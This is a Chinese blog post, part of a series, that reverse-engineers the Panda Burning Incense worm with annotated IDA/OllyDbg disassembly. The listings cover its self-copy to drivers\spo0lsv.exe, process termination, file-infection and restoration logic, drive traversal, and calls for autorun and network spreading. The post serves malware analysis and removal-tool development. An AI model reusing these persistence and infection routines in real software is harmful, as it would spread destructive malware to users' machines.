- 書接上文,接下來就是使用IAT、OD進行病毒彙編代碼的詳細分析:
- 上文鏈接:長文預警-超詳細的熊貓燒香病毒分析_00
- 附帶自己寫的專殺工具,僅供參考(附贈專殺工具源碼,由於時間倉促所以工具並不是很完善,有問題歡迎指正)。
- 資源
2.IAT-OD雙劍合璧
-
爲了更好的分析,可以先使用IAT的簽名工具來更好的識別庫代碼
- 在IDA中Shift+F5打開簽名窗口,ins快捷鍵打開簽名庫,Ctrl+F找到Delphi的特徵庫,然後加載。
- 在IDA中Shift+F5打開簽名窗口,ins快捷鍵打開簽名庫,Ctrl+F找到Delphi的特徵庫,然後加載。
-
我們使用IDA和OD聯合分析的手段對病毒樣本進行分析:
-
從OEP開始單步分析:
seg000:0040D278 push ebp ; oep
seg000:0040D279 mov ebp, esp
seg000:0040D27B add esp, 0FFFFFFE8h
seg000:0040D27E push ebx
seg000:0040D27F push esi
seg000:0040D280 xor eax, eax
seg000:0040D282 mov [ebp+var_18], eax ; 初始化局部空間爲0
seg000:0040D285 mov [ebp+var_14], eax ; 初始化局部空間爲0
seg000:0040D288 mov eax, offset dword_40D1C8 ; 內部調用了GetModuleHandle函數
seg000:0040D28D call @Sysinit@@InitExe$qqrpv ; Sysinit::__linkproc__ InitExe(void *)
seg000:0040D292 mov ebx, offset dword_40F7E8 ; 兩塊空間首地址
seg000:0040D297 mov esi, offset Msg
seg000:0040D29C xor eax, eax ; 清零
seg000:0040D29E push ebp ; 三個入棧操作,不知道具體使用場景????
seg000:0040D29E ; ebp是棧地址0012FF88
seg000:0040D29F push offset loc_40D669
seg000:0040D2A4 push dword ptr fs:[eax] ; eax=0,這裏是fs段首地址
seg000:0040D2A7 mov fs:[eax], esp
seg000:0040D2AA mov eax, dword_40D678
seg000:0040D2B0 mov [ebx], eax
seg000:0040D2B2 mov eax, dword_40D67C
seg000:0040D2B8 mov [ebx+4], eax
seg000:0040D2BB mov ax, word_40D680
seg000:0040D2C2 mov [ebx+8], ax
seg000:0040D2C6 mov al, byte_40D682
seg000:0040D2CC mov [ebx+0Ah], al
seg000:0040D2CF mov eax, offset dword_40F7DC ; Delphi程序默認是fastcall,前兩個參數有eax,edx傳遞
seg000:0040D2CF ; 保存字符串首地址指針
seg000:0040D2D4 mov edx, offset dword_40D68C ; 存儲信息字符串首地址
seg000:0040D2D9 call StringCopy ; 函數用於字符串拷貝,之後都是一些字符串拷貝操作
- 之後執行到地址0040D5A6
seg000:0040D5A6 mov eax, offset dword_40F7E4 ; 地址存儲字符串指針
seg000:0040D5AB mov edx, offset dword_40D820 ;
seg000:0040D5AB ; "艾瑪!26"
seg000:0040D5B0 call StringCopy
seg000:0040D5B5 mov eax, offset dword_40F7D4
seg000:0040D5BA mov edx, offset dword_40D830 ;
seg000:0040D5BA ; "***武*漢*男*生*感*染*下*載*者***"
seg000:0040D5BF call StringCopy
seg000:0040D5C4 mov eax, offset dword_40F7D8
seg000:0040D5C9 mov edx, offset dword_40D85C ;
seg000:0040D5C9 ; "感謝艾瑪,mopery,海色の月,對此木馬的關注?"
seg000:0040D5CE call StringCopy
seg000:0040D5D3 lea ecx, [ebp+var_14] ; 堆棧地址
seg000:0040D5D6 mov edx, offset aXboy_0 ; "xboy"
seg000:0040D5DB mov eax, offset dword_40D8A0 ;
seg000:0040D5DB ; "++戊+緩"叛*聾+肛+刪"蚊*苜+兆++*"
seg000:0040D5E0 call sub_405250 ; 這是一個解密字符串的函數,會將返回值存入[ebp-0x18]中
seg000:0040D5E0 ; 將dword_40D8A0解密爲"***武*漢*男*生*感*染*下*載*者***"
seg000:0040D5E5 mov edx, [ebp+var_14] ; 解密後的字符串首地址存入edx中
seg000:0040D5E8 mov eax, dword_40F7D4 ; 前面字符串拷貝後的字符串首地址
seg000:0040D5E8 ; 存儲的內容是"***武*漢*男*生*感*染*下*載*者***"
seg000:0040D5ED call StringCmp ; 用於字符串比較的函數
seg000:0040D5F2 jz short loc_40D5FD ; 關鍵跳轉
seg000:0040D5F4 push 0 ; uExitCode
seg000:0040D5F6 call j_ExitProcess_0 ; 跳轉失敗,結束進程
seg000:0040D5F6 ; 上面的操作驗證了一些作者信息和感謝信息,驗證成功後會進入病毒部分
- 上面的操作驗證了一些作者信息和感謝信息,驗證成功後會進入病毒部分,也就是loc_40D5FD所在部分
seg000:0040D5FD ; ---------------------------------------------------------------------------
seg000:0040D5FD
seg000:0040D5FD loc_40D5FD: ; CODE XREF: start+37Aj
seg000:0040D5FD lea ecx, [ebp+var_18] ; 跳轉成功,進入病毒實際操作部分
seg000:0040D600 mov edx, offset aWhboy_0 ; 用於解密的密鑰
seg000:0040D605 mov eax, offset dword_40D8DC ; 地址中存儲的不是有意義的字符串,應該是加密過的
seg000:0040D60A call sub_405250 ; 解密字符串函數,會將返回值存入[ebp-0x18]中
seg000:0040D60F mov edx, [ebp+var_18] ; 解密出正確的字符串爲
seg000:0040D60F ; "`uup2..uxe`tm/vhjnx.fdu/nsm&uyt"
seg000:0040D612 mov eax, offset dword_40D908
seg000:0040D617 call StringCmp ; 比較
seg000:0040D61C jz short loc_40D627 ; 關鍵跳轉
seg000:0040D61E push 0 ; uExitCode
seg000:0040D620 call j_ExitProcess_0 ; 未成功跳轉結束進程
seg000:0040D620 ; 上述標號爲loc_40D5FD的一段代碼似乎是在次判斷病毒是否能啓動
seg000:0040D625 ; ---------------------------------------------------------------------------
- 上述再次驗證成功後,就到了代碼的真正操作部分,這裏有三個call對應着三種操作的函數
第一個call-保存副本並運行
seg000:0040D627 ; ---------------------------------------------------------------------------
seg000:0040D627
seg000:0040D627 loc_40D627: ; CODE XREF: start+3A4j
seg000:0040D627 call CreateAndRunPanda ; 重命名爲CreateAndRunPanda 創建並運行病毒副本
seg000:0040D62C call InfectOtherFile ;重命名爲InfectOtherFile 感染操作
seg000:0040D631 call ProtectSelf ;重命名爲ProtectSelf 保護自身
seg000:0040D636 jmp short loc_40D63E
seg000:0040D638 ; ---------------------------------------------------------------------------
- 首先是第一個函數,重命名爲CreateAndRunPanda,它創建了病毒樣本副本並運行這個副本。
seg000:0040819C push ebp ; 開闢棧幀,開闢局部變量區域,大小爲0x84*2
seg000:0040819D mov ebp, esp
seg000:0040819F mov ecx, 84h
seg000:004081A4
seg000:004081A4 loc_4081A4: ; CODE XREF: CreateAndRunPanda+Dj
seg000:004081A4 push 0
seg000:004081A6 push 0
seg000:004081A8 dec ecx
seg000:004081A9 jnz short loc_4081A4 ; 循環初始化局部變量空間爲0
seg000:004081AB push ecx ; 保存寄存器環境
seg000:004081AC push ebx ; apt
seg000:004081AD push esi ; hdc
seg000:004081AE push edi ; cpt
seg000:004081AF xor eax, eax ; 清零eax
seg000:004081B1 push ebp ; aj
seg000:004081B2 push offset loc_408781 ; apt
seg000:004081B7 push dword ptr fs:[eax] ; hdc
seg000:004081BA mov fs:[eax], esp
seg000:004081BD lea edx, [ebp+var_3B8] ; ebp-0x3B8應該是傳出參數
seg000:004081C3 xor eax, eax
seg000:004081C5 call GetPathName ; 函數返回了一個地址"C:\Users\15pb-win7\Desktop\xmDump_.exe"
seg000:004081C5 ; 判斷是獲取了當前程序所在路徑
seg000:004081CA mov eax, [ebp+var_3B8] ; 得到的當前程序路徑
seg000:004081D0 lea edx, [ebp+var_3B4] ; ebp+0x3B4傳出參數
seg000:004081D6 call GetPath ; 函數用來從獲取到的路徑獲取到無名稱的路徑
seg000:004081D6 ; "C:\Users\15pb-win7\Desktop\"
seg000:004081D6 ; 也就是得到目錄路徑
seg000:004081DB lea eax, [ebp+var_3B4] ; 得到的當前程序所在目錄路徑
seg000:004081E1 mov edx, offset aDesktop__ini ; 文件名"Desktop_.ini"
seg000:004081E6 call StringCat ; 字符串拼接
seg000:004081EB mov eax, [ebp+var_3B4] ; 拼接後的字符串首地址
seg000:004081F1 call @Sysutils@FileExists$qqrx17System@AnsiString ; 檢查路徑下的文件"Desktop_.ini"是否存在
seg000:004081F6 test al, al ; 通過返回值al來判斷是否存在
seg000:004081F6 ; al爲0不存在
seg000:004081F8 jz loc_408288 ; 不存在文件跳轉
seg000:004081FE push 80h ; 要設置的文件的屬性
seg000:004081FE ; FILE_ATTRIBUTe_NORMAL
seg000:004081FE ; 這裏提前入棧了
seg000:00408203 lea edx, [ebp+var_3C0] ; 保存路徑字符串首地址
seg000:00408209 xor eax, eax
seg000:0040820B call GetPathName ; 獲取路徑
seg000:00408210 mov eax, [ebp+var_3C0]
seg000:00408216 lea edx, [ebp+var_3BC] ; 保存文件名目錄路徑首地址
seg000:0040821C call GetPath ; 得到目錄路徑
seg000:00408221 lea eax, [ebp+var_3BC] ; 保存拼接後路徑
seg000:00408227 mov edx, offset aDesktop__ini ; "Desktop_.ini"
seg000:0040822C call StringCat ; 拼接字符串
seg000:00408231 mov eax, [ebp+var_3BC] ; 傳入拼接後的字符串
seg000:00408237 call CheckPath ; 檢查路徑
seg000:0040823C push eax ; lpFileName
seg000:0040823D call j_SetFileAttributesA ; 設置文件屬性
seg000:00408242 push 1 ; dwMilliseconds
seg000:00408244 call j_Sleep ; 設置等待時間
seg000:00408249 lea edx, [ebp+var_3C8]
seg000:0040824F xor eax, eax
seg000:00408251 call GetPathName ; 繼續獲取文件路徑
seg000:00408256 mov eax, [ebp+var_3C8]
seg000:0040825C lea edx, [ebp+var_3C4]
seg000:00408262 call GetPath ; 獲取目錄路徑
seg000:00408267 lea eax, [ebp+var_3C4]
seg000:0040826D mov edx, offset aDesktop__ini ; "Desktop_.ini"
seg000:00408272 call StringCat ; 拼接字符串
seg000:00408277 mov eax, [ebp+var_3C4]
seg000:0040827D call CheckPath ; 檢查路徑
seg000:00408282 push eax ; lpFileName
seg000:00408283 call j_DeleteFileA ; 刪除文件
seg000:00408283 ; 上述代碼用於獲取當前路徑,同時將"Desktop_.ini"拼接到路徑中
seg000:00408283 ; 並檢查是否存在,存在的話會對文件進行刪除
- 之後執行loc_408288處的代碼
seg000:00408288 loc_408288: ; CODE XREF: CreateAndRunPanda+5Cj
seg000:00408288 lea edx, [ebp+var_3CC] ; Desktop_.ini不存在跳轉到此
seg000:00408288 ; ebp-0x3CC存儲下一個路徑
seg000:0040828E xor eax, eax
seg000:00408290 call GetPathName ; 尋找下一個路徑
seg000:00408295 mov eax, [ebp+var_3CC]
seg000:0040829B lea edx, [ebp+var_4] ; 通過路徑將當前程序讀取到內存中
seg000:0040829B ; 使用ebp-0x4保存其首地址
seg000:0040829E call ReadFilToMem ; 讀取文件到內存
seg000:004082A3 lea eax, [ebp+var_8]
seg000:004082A6 call SetAFlag ; 在內存之前設置一個標記
seg000:004082AB mov eax, [ebp+var_4] ; 內存首地址
seg000:004082AE call GetFileLen ; 獲取到文件的大小
seg000:004082AE ; 大小存儲在內存首地址-0x4的位置
seg000:004082AE ; Delphi程序字符串首地址減去0x4的位置存儲的就是字符串的長度
seg000:004082B3 mov ebx, eax ; ebx存儲長度
seg000:004082B5 jmp short loc_4082DB
- 讀取文件到內存成功後,跳轉到 loc_4082DB繼續執行代碼
seg000:004082DB loc_4082DB: ; CODE XREF: CreateAndRunPanda+119j
seg000:004082DB test ebx, ebx ; 判斷內存大小
seg000:004082DD jle short loc_4082E9
seg000:004082DF mov eax, [ebp+var_4]
seg000:004082E2 cmp byte ptr [eax+ebx-1], 0
seg000:004082E7 jnz short loc_4082B7 ;
seg000:004082E7 ; 上述代碼操作就是將病毒文件信息讀取到內存中,
seg000:004082E9 loc_4082E9: ; CODE XREF: CreateAndRunPanda+141j
seg000:004082E9 cmp [ebp+var_8], 0 ; 判斷這個標記,前面設置過
seg000:004082ED jnz loc_40845E ; 不等於0跳轉
seg000:004082F3 lea edx, [ebp+var_3D8] ; 存放路徑的數組的首地址指針
seg000:004082F9 xor eax, eax
seg000:004082FB call GetPathName ; 得到文件路徑,帶文件名
seg000:00408300 mov eax, [ebp+var_3D8]
seg000:00408306 lea edx, [ebp+var_3D4] ; 存儲大寫路徑字符串的首地址指針
seg000:0040830C call StringToUpper ; 轉換爲大寫
seg000:00408311 mov eax, [ebp+var_3D4] ; 大寫路徑首地址
seg000:00408317 push eax
seg000:00408318 lea eax, [ebp+var_3E4] ; 用於存儲系統路徑
seg000:0040831E call GetSystemPath ; 得到系統路徑
seg000:00408323 push [ebp+var_3E4]
seg000:00408329 push offset aDrivers ; "drivers\\"
seg000:0040832E push offset aSpo0lsv_exe ; "spo0lsv.exe"
seg000:00408333 lea eax, [ebp+var_3E0] ; 多個字符串拼接,拼接後的字符串首地址存儲在ebp-0x3E0
seg000:00408339 mov edx, 3 ; 指明瞭參數個數
seg000:0040833E call StringCatN ; 拼接多個字符串爲一個
seg000:00408343 mov eax, [ebp+var_3E0]
seg000:00408349 lea edx, [ebp+var_3DC] ; 存儲大寫路徑首地址指針
seg000:0040834F call StringToUpper ; 轉化爲大寫
seg000:00408354 mov edx, [ebp+var_3DC] ; 大寫路徑首地址"C:\WINDOWS\SYSTEM32\DRIVERS\SPO0LSV.EXE"
seg000:0040835A pop eax ; 當前程序的路徑首地址
seg000:0040835B call StringCmp ; 比較
seg000:00408360 jz loc_40845E ; 相同跳轉
seg000:00408366 mov eax, offset aSpo0lsv_exe ; "spo0lsv.exe"
seg000:0040836B call FindAndTerminateProcess ; 關閉進程
seg000:00408370 mov eax, offset aSpo0lsv_exe ; "spo0lsv.exe"
seg000:00408375 call FindAndTerminateProcess
seg000:0040837A push 80h ; dwFileAttributes
seg000:0040837A ; FILE_ATTRIBUTE_NORMAL
seg000:0040837F lea eax, [ebp+var_3EC] ; 再次獲取系統路徑
seg000:00408385 call GetSystemPath
seg000:0040838A push [ebp+var_3EC]
seg000:00408390 push offset aDrivers ; "drivers\\"
seg000:00408395 push offset aSpo0lsv_exe ; "spo0lsv.exe"
seg000:0040839A lea eax, [ebp+var_3E8] ; 再次進行路徑拼接
seg000:004083A0 mov edx, 3
seg000:004083A5 call StringCatN
seg000:004083AA mov eax, [ebp+var_3E8]
seg000:004083B0 call CheckPath ; 檢查路徑
seg000:004083B5 push eax ; lpFileName
seg000:004083B6 call j_SetFileAttributesA ; 修改文件屬性
seg000:004083BB push 1 ; dwMilliseconds
seg000:004083BD call j_Sleep ; 設置睡眠時間
seg000:004083C2 push 0 ; apt
seg000:004083C4 lea eax, [ebp+var_3F4]
seg000:004083CA call GetSystemPath ; 獲取系統路徑
seg000:004083CF push [ebp+var_3F4]
seg000:004083D5 push offset aDrivers ; "drivers\\"
seg000:004083DA push offset aSpo0lsv_exe ; "spo0lsv.exe"
seg000:004083DF lea eax, [ebp+var_3F0]
seg000:004083E5 mov edx, 3
seg000:004083EA call StringCatN ; 拼接
seg000:004083EF mov eax, [ebp+var_3F0]
seg000:004083F5 call CheckPath ; 檢查路徑
seg000:004083FA push eax ; 文件"spo0lsv.exe"路徑如入棧保存
seg000:004083FB lea edx, [ebp+var_3F8]
seg000:00408401 xor eax, eax
seg000:00408403 call GetPathName ; 得到當前進程路徑
seg000:00408408 mov eax, [ebp+var_3F8]
seg000:0040840E call CheckPath ; 檢查路徑
seg000:00408413 push eax ; lpExistingFileName
seg000:00408414 call j_CopyFileA ; 拷貝當前程序到"C:\Windows\system32\drivers\spo0lsv.exe"
seg000:00408414 ; 這個就是熊貓燒香的文件副本
seg000:00408414 ; 專殺工具要關注的地方
seg000:00408419 push 1 ; uCmdShow
seg000:0040841B lea eax, [ebp+var_400]
seg000:00408421 call GetSystemPath ; 重新獲取系統路徑
seg000:00408426 push [ebp+var_400] ; 入棧系統路徑首地址指針
seg000:0040842C push offset aDrivers ; "drivers\\"
seg000:00408431 push offset aSpo0lsv_exe ; "spo0lsv.exe"
seg000:00408436 lea eax, [ebp+var_3FC]
seg000:0040843C mov edx, 3
seg000:00408441 call StringCatN ; 拼接爲路徑"C:\Windows\system32\drivers\spo0lsv.exe"
seg000:00408446 mov eax, [ebp+var_3FC]
seg000:0040844C call CheckPath ; 檢查路徑
seg000:00408451 push eax ; lpCmdLine
seg000:00408452 call j_WinExec ; 運行病毒副本所在的文件
seg000:00408457 push 0 ; uExitCode
seg000:00408459 call j_ExitProcess_0 ; 退出程序
seg000:00408459 ; 上述操作就是病毒所做的第一步操作
seg000:00408459 ; 刪除系統路徑下的spo0lsv文件,然後將將病毒自身僞裝成
seg000:00408459 ; spo0lsv文件存儲在系統路徑下,之後打開這個文件,並結
seg000:00408459 ; 束掉自身
- 上述代碼當檢測到系統路徑下已經存在病毒文件後,會執行下述的代碼,釋放之前申請存放病毒文件信息的內存,並獲取標記信息。我們可以修改關鍵跳轉進入這個流程,然後繼續分析。
seg000:00408741 loc_408741: ; CODE XREF: CreateAndRunPanda+2D6j
seg000:00408741 mov edx, [ebp+var_8] ; 申請內存空間首地址
seg000:00408744 mov eax, offset dword_4087D8 ; 地址dword_4087D8存儲的是0x1
seg000:00408749 call unknown_libname_77 ; 對標號進行檢查
seg000:0040874E test eax, eax
seg000:00408750 jg loc_408477 ; 如果找到標記字符,則跳轉
-
運行病毒樣本,找到被感染的exe程序(也就是變爲熊貓燒香圖標的程序),然後使用OD調試,判斷修改的方式。
-
要分析的原文件的屬性:
-
中毒後大小:
可以看出中病毒後的程序的大小剛好是病毒樣本的大小加上原程序的大小,所以可以猜測病毒並未對原程序做刪除操作,應該是在原程序基礎上添加了病毒程序。 -
下面進行分析,使用已經被感染的程序在OD中分析,這樣可以進入下面跳轉的代碼:
標號是如下的一段信息:
下面是在IDA中的分析,這段代碼的主要功能就是提取出被病毒改寫的文件的原本信息,然後在當前的文件夾再創建一個原文件(即在當前目錄下釋放出一個原始文件),被病毒感染過的文件保存有原文件內容。之後代碼進入到loc_408584處。
seg000:00408477 ; ---------------------------------------------------------------------------
seg000:00408477
seg000:00408477 loc_408477: ; CODE XREF: CreateAndRunPanda+5B4j
seg000:00408477 lea eax, [ebp+var_14] ; 如果標記存在,跳轉到此處
seg000:0040847A push eax ; 這個push用於之後的CpyStrMem運算
seg000:0040847B mov edx, [ebp+var_8] ; 標記字符串指針
seg000:0040847E mov eax, offset dword_4087D8 ; 0x1是標記字符串的結尾
seg000:00408483 call FindSingPos ; 獲取標號0x1的位置
seg000:00408488 mov ecx, eax
seg000:0040848A dec ecx ; 對所在位置減一,得到的就是標記字符串的大小
seg000:0040848B mov edx, 1
seg000:00408490 mov eax, [ebp+var_8] ; 文件在內存中的首地址
seg000:00408493 call CpyStrMem ; 拷貝一份無0x1結尾的標記,新的標記首地址存入ebp-0x14內存中
seg000:00408498 lea eax, [ebp+var_14]
seg000:0040849B mov ecx, 5
seg000:004084A0 mov edx, 1
seg000:004084A5 call DeleteStringBuf ; 刪除標記的前五個字節,也就是WhBoy
seg000:004084AA lea eax, [ebp+var_C]
seg000:004084AD push eax ; 這個push也用於之後的CpyStrMem運算
seg000:004084AE mov edx, [ebp+var_14]
seg000:004084B1 mov eax, offset dword_4087E4 ; 0x2
seg000:004084B6 call FindSingPos ; 獲取去掉前五個字節後的字符串中0x2的位置
seg000:004084BB mov ecx, eax
seg000:004084BD dec ecx ; 得到字符串長度
seg000:004084BE mov edx, 1
seg000:004084C3 mov eax, [ebp+var_14]
seg000:004084C6 call CpyStrMem ; 拷貝一份新的長度的字符串到ebp-0xc
seg000:004084CB mov edx, [ebp+var_14]
seg000:004084CE mov eax, offset dword_4087E4
seg000:004084D3 call FindSingPos ; 又進行了上一個字符串操作
seg000:004084D8 mov ecx, eax
seg000:004084DA lea eax, [ebp+var_14]
seg000:004084DD mov edx, 1
seg000:004084E2 call DeleteStringBuf ; 清除0x2標記即其之前的字符串,只留下了一串數字
seg000:004084E2 ; 這串數字就是原先文件的大小
seg000:004084E7 mov eax, [ebp+var_14] ; 清除後的字符串
seg000:004084EA call StrToInt ; 轉換爲int型
seg000:004084EF mov [ebp+var_18], eax ; 大小存入ebp-0x18
seg000:004084F2 xor eax, eax
seg000:004084F4 push ebp ; uStyle
seg000:004084F5 push offset loc_40857A ; lpReOpenBuff
seg000:004084FA push dword ptr fs:[eax] ; lpFileName
seg000:004084FD mov fs:[eax], esp
seg000:00408500 mov edx, [ebp+var_C] ; 去掉前五個字節的標記字符串的首地址
seg000:00408503 lea eax, [ebp+var_1E4]
seg000:00408509 call CreateNewFile ; 根據原文件的名稱創建出新文件
seg000:0040850E mov eax, off_40E2BC
seg000:00408513 mov byte ptr [eax], 2
seg000:00408516 lea eax, [ebp+var_1E4] ; 文件指針
seg000:0040851C call OpenFile ; 打開文件,以文本的方式
seg000:00408521 call _IOTest
seg000:00408526 lea eax, [ebp+var_404]
seg000:0040852C push eax
seg000:0040852D mov eax, [ebp+var_4] ; 當前文件信息的首地址
seg000:00408530 call GetFileLen ; 獲取當前文件信息的大小
seg000:00408535 mov edx, eax
seg000:00408537 sub edx, [ebp+var_18] ; 減去原文件大小得到病毒文件大小
seg000:0040853A mov ecx, [ebp+var_18] ; 原文件大小
seg000:0040853D mov eax, [ebp+var_4] ; 當前文件信息首地址
seg000:00408540 call CpyStrMem ; 拷貝一份獲取原文件信息
seg000:00408545 mov edx, [ebp+var_404] ; 拷貝的原文件信息首地址指針存放在ebp-0x404
seg000:0040854B lea eax, [ebp+var_1E4] ; 新建的文件指針
seg000:0040854B ; 之後的操作應該是向新建的文件中寫入原文件內容
seg000:00408551 call WriteFileInfo
seg000:00408556 call Flush ; 提交緩衝區
seg000:0040855B call _IOTest
seg000:00408560 lea eax, [ebp+var_1E4]
seg000:00408566 call CloseFile ; 關閉文件
seg000:0040856B call _IOTest
seg000:00408570 xor eax, eax
seg000:00408572 pop edx
seg000:00408573 pop ecx
seg000:00408574 pop ecx
seg000:00408575 mov fs:[eax], edx
seg000:00408578 jmp short loc_408584
seg000:0040857A ; ---------------------------------------------------------------------------
seg000:00408584 loc_408584: ; CODE XREF: CreateAndRunPanda+3DCj
seg000:00408584 call sub_407B68 ; 批處理文件函數
seg000:00408589 mov eax, offset aSpo0lsv_exe ; "spo0lsv.exe"
seg000:0040858E call sub_405458 ; 檢查進程中是否存在spo0lsv.exe
seg000:00408593 test al, al
seg000:00408595 jnz loc_40873A ; 存在就跳轉
seg000:00408595 ; 若不存在就從病毒文件中重新提取病毒樣本
seg000:00408595 ; 然後執行類似上述標號爲loc_4082E9的代碼
seg000:00408595 ; 重新在系統路徑中生成spo0lsv.exe文件
seg000:0040859B push 80h ; dwFileAttributes
-
總結下來,被感染文件主要就是用來維護病毒文件,如果系統目錄下的病毒文件被刪除了,被感染文件會重新創建一份在系統目錄下。
第二個call-感染過程
-
前面說的三個call中的第二個call就是病毒對與文件的感染過程。通過分析這個函數,就可以知道病毒的感染流程,然後針對性的進行修復。
-
將第二個call重命名爲InfectOtherFile,這是熊貓燒香的核心部分。函數內部使用瞭如下三種方式進行病毒的感染:
seg000:0040D18C InfectOtherFile proc near ; CODE XREF: start+3B4p
seg000:0040D18C call CreateInfectThread ; 創建感染線程
seg000:0040D191 call SetTimerAuto ; 通過時鐘寫Autorun.inf文件
seg000:0040D196 mov ax, 0Ah
seg000:0040D19A call NetWorkInfect ; 通過網絡進行感染
seg000:0040D19F retn
seg000:0040D19F InfectOtherFile endp
1.線程回調分析
- 首先進行現場感染分析,進入函數找到線程的回調函數所在地址sub_40A48C。
seg000:0040A5B0 CreateInfectThread proc near ; CODE XREF: InfectOtherFilep
seg000:0040A5B0 push ecx
seg000:0040A5B1 push esp ; lpThreadId
seg000:0040A5B2 push 0 ; dwCreationFlags
seg000:0040A5B4 push 0 ; lpParameter
seg000:0040A5B6 push offset sub_40A48C ; lpStartAddress
seg000:0040A5BB push 0 ; dwStackSize
seg000:0040A5BD push 0 ; lpThreadAttributes
seg000:0040A5BF call j_CreateThread_0
seg000:0040A5C4 pop edx
seg000:0040A5C5 retn
seg000:0040A5C5 CreateInfectThread endp
- 分析線程回調函數:
;省略部分開闢棧幀代碼
seg000:0040A49B xor eax, eax
seg000:0040A49D push ebp
seg000:0040A49E push offset loc_40A57F
seg000:0040A4A3 push dword ptr fs:[eax] ; fs段首地址
seg000:0040A4A6 mov fs:[eax], esp ; fs段首地址賦值爲esp
seg000:0040A4A9 lea eax, [ebp+var_4] ; 存放驅動器名稱
seg000:0040A4AC call GetDriverNameStr ; 函數用來獲取驅動器名稱,生成一個名稱字符串
seg000:0040A4B1 mov eax, [ebp+var_4]
seg000:0040A4B4 call GetFileLen ; 得到驅動器的個數
seg000:0040A4B9 mov esi, eax
seg000:0040A4BB
seg000:0040A4BB loc_40A4BB: ; CODE XREF: sub_40A48C+34j
seg000:0040A4BB ; sub_40A48C+D3j
seg000:0040A4BB mov ebx, esi
seg000:0040A4BD cmp ebx, 1
seg000:0040A4C0 jl short loc_40A4BB ; 判斷驅動器個數是否小於1,小於跳轉
- 不進行跳轉就順序執行到了標號爲loc_40A4C2的地址處的代碼:
seg000:0040A4C2 loc_40A4C2: ; CODE XREF: sub_40A48C+CDj
seg000:0040A4C2 lea eax, [ebp+var_C]
seg000:0040A4C5 mov edx, [ebp+var_4]
seg000:0040A4C8 mov dl, [edx+ebx-1] ; 使用一個值修改edx中的地址
seg000:0040A4CC call StrToChr ; 將字符串轉換爲字符
seg000:0040A4D1 mov eax, [ebp+var_C] ; 轉換後的字符的指針
seg000:0040A4D4 lea edx, [ebp+var_8] ; 存儲大寫的驅動器字符名稱
seg000:0040A4D7 call StringToUpper ; 轉換爲大寫
seg000:0040A4DC mov eax, [ebp+var_8]
seg000:0040A4DF push eax ; 入棧保存
seg000:0040A4E0 lea edx, [ebp+var_10]
seg000:0040A4E3 mov eax, offset dword_40A594 ; 字符"a"
seg000:0040A4E8 call StringToUpper
seg000:0040A4ED mov eax, [ebp+var_10] ; 大寫字符"A"
seg000:0040A4F0 pop edx ; 大寫的驅動器名稱
seg000:0040A4F1 call FindSingPos ; 獲取驅動名稱中以直到A的長度
seg000:0040A4F1 ; 在虛擬機中只有C盤,所以爲0
seg000:0040A4F6 test eax, eax
seg000:0040A4F8 jnz short loc_40A556 ; 不爲0跳轉
seg000:0040A4FA lea eax, [ebp+var_18]
seg000:0040A4FD mov edx, [ebp+var_4]
seg000:0040A500 mov dl, [edx+ebx-1]
seg000:0040A504 call StrToChr ; 又進行了一次轉換
seg000:0040A504 ; 這是爲了第二次判斷驅動器
seg000:0040A509 mov eax, [ebp+var_18]
seg000:0040A50C lea edx, [ebp+var_14]
seg000:0040A50F call StringToUpper
seg000:0040A514 mov eax, [ebp+var_14]
seg000:0040A517 push eax
seg000:0040A518 lea edx, [ebp+var_1C]
seg000:0040A51B mov eax, offset dword_40A5A0 ; 字符"b"
seg000:0040A520 call StringToUpper ; 轉換爲"B"
seg000:0040A525 mov eax, [ebp+var_1C]
seg000:0040A528 pop edx
seg000:0040A529 call FindSingPos ; 再次判斷B在驅動器名稱中的位置
seg000:0040A52E test eax, eax
seg000:0040A530 jnz short loc_40A556
seg000:0040A532 lea eax, [ebp+var_20]
seg000:0040A535 mov edx, [ebp+var_4]
seg000:0040A538 mov dl, [edx+ebx-1]
seg000:0040A53C call StrToChr ; BDS 2005-2007 and Delphi6-7 Visual Component Library
seg000:0040A541 lea eax, [ebp+var_20]
seg000:0040A544 mov edx, offset loc_40A5AC ; ASCII ":\"
seg000:0040A549 call StringCat ; 拼接爲一個路徑
seg000:0040A54E mov eax, [ebp+var_20]
seg000:0040A551 call FindFileAndInfect ; 通過獲取到的驅動器(磁盤路徑)遍歷內部文件
seg000:0040A551 ; 然後感染他們
seg000:0040A556
seg000:0040A556 loc_40A556:
seg000:0040A556
seg000:0040A556 dec ebx ; 遞減驅動器個數進行循環
seg000:0040A557 test ebx, ebx
seg000:0040A559 jnz loc_40A4C2
seg000:0040A55F jmp loc_40A4BB ; while true
seg000:0040A55F sub_40A48C endp
- 通過上述分析,找到了一個關鍵的感染函數- sub.00409348,將其重命名爲FindFileAndInfect,然後進入函數內部進行分析:
;省略局部空間初始化等部分代碼
seg000:00409393 mov eax, [ebp+strDriverPath] ; 驅動器路徑
seg000:00409396 call GetFileLen ; 得到路徑字符串大小
seg000:0040939B mov edx, [ebp+strDriverPath]
seg000:0040939E cmp byte ptr [edx+eax-1], 5Ch ; 判斷最後一個字符是否爲"\"
seg000:004093A3 jz short loc_4093B2 ; 是的話跳轉
seg000:004093A5 lea eax, [ebp+strDriverPath] ; 不是的話拼接一個"\"
seg000:004093A8 mov edx, offset dword_40A1B0 ; 字符"\"
seg000:004093AD call StringCat
seg000:004093B2
seg000:004093B2 loc_4093B2:
seg000:004093B2 lea eax, [ebp+var_178] ; 存儲拼接後的路徑
seg000:004093B8 mov ecx, offset dword_40A1BC ; 通配符"*.*"
seg000:004093BD mov edx, [ebp+strDriverPath]
seg000:004093C0 call DriverPathCat ; 進行拼接
seg000:004093C5 mov eax, [ebp+var_178]
seg000:004093CB lea ecx, [ebp+var_164]
seg000:004093D1 mov edx, 3Fh
seg000:004093D6 call FindFirst ; 查找文件,結果存放在[tbp-0x164]中
seg000:004093DB test eax, eax
seg000:004093DD jnz loc_40A118 ; 查找失敗,跳轉
seg000:004093E3
seg000:004093E3 loc_4093E3:
seg000:004093E3 mov eax, [ebp+var_15C]
seg000:004093E9 and eax, 10h
seg000:004093EC cmp eax, 10h
seg000:004093EF jnz loc_409BFC ; 檢查是否爲目錄即faDirectory
seg000:004093EF ; 不是目錄則跳轉,對相應的文件做處理
seg000:004093F5 mov eax, [ebp+var_158]
seg000:004093FB cmp byte ptr [eax], 2Eh ; 排除以 "."開始的系統特殊目錄
seg000:004093FE jz loc_409BFC
seg000:00409404 lea edx, [ebp+var_17C]
seg000:0040940A mov eax, offset aWindows_0 ; "WINDOWS"
seg000:0040940F call StringToUpper
seg000:00409414 mov eax, [ebp+var_17C] ; 大寫的"WINDOWS"
seg000:0040941A push eax ; 入棧保存
